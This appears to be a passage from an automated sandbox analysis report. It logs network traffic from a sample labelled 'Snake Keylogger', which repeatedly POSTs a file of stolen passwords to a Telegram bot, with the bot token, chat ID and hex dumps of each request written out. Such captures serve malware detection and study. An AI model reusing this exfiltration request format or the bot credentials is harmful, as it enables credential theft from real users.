                                                                    2022-06-26 07:32:48 UTC42OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 61 35 65 39 36 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756da5e9696Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:48 UTC43INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:48 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:48 UTC43INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66772,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228768,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    250192.168.2.550162149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:26 UTC422OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575714837b7d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:26 UTC422OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 34 38 33 37 62 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575714837b7dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:26 UTC423INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:26 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:26 UTC423INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67032,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228866,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    251192.168.2.550163149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:26 UTC423OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575714eec568
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:26 UTC424OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 34 65 65 63 35 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575714eec568Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:27 UTC424INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:27 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:27 UTC425INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67033,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228867,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    252192.168.2.550164149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:27 UTC425OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757152338e1
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:27 UTC425OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 35 32 33 33 38 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757152338e1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:27 UTC426INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:27 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:27 UTC426INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67034,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228867,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    253192.168.2.550165149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:27 UTC427OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757156135bb
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:27 UTC427OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 35 36 31 33 35 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757156135bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:27 UTC428INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:27 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:27 UTC428INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67036,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228867,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    254192.168.2.550166149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:28 UTC428OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757159cd6bc
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:28 UTC429OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 35 39 63 64 36 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757159cd6bcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:28 UTC429INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:28 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:28 UTC430INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67037,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228868,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    255192.168.2.550167149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:28 UTC430OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575715e1f502
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:28 UTC430OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 35 65 31 66 35 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575715e1f502Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:28 UTC431INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:28 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:28 UTC431INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67038,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228868,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    256192.168.2.550168149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:28 UTC432OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757161ff376
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
